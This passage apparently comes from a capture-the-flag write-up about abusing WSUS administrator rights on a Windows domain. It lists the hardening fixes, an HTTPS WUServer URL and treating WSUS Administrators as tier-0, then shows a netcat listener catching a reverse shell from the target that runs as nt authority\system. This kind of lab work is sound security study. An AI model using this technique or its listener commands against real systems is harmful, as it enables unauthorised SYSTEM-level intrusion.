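Both Get-ItemProperty dumps above (client and DC) would raise the first two findings: HTTP transport and AcceptTrustedPublisherCerts set to 1. The structural fixes are an HTTPS WUServer URL and treating WSUS Administrators as a tier-0 group with a handful of members, because, as this box shows, a member needs no further vulnerability to run a package as SYSTEM on every client, the DC included.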
It takes about a minute for this to fire, and it fails occasionally. If it fails, I’ll try again, but eventually there’s a connection at nc:
kali$ rlwrap -cAr nc -lvnp 445
Listening on 0.0.0.0 445
Connection received on 10.10.10.10 49944
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system